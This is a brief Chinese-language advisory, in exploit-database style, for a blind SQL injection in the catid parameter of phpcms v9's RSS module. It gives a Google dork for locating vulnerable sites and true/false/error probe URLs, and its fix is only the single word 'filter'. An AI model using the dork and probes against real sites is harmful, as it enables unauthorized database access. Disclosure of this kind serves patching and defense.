影响版本:phpcms v9 blind
官方网站:

漏洞类型:SQL注入
漏洞描述:phpcms v9 blind 参数过滤存在SQL注入漏洞。
 

google dork:inurl:"index.php?m=content+c=rss+catid=10"
 

exploit & p0c

[!] index.php?m=content&c=rss&catid=[valid catid]

Example p0c

[!] ?m=content&c=rss&catid=10 <= True

[!] ?m=content&c=rss&catid=-10 <= False

[+] ?m=content&c=rss&catid=5 <= show MySQL Error (table)


修复:过滤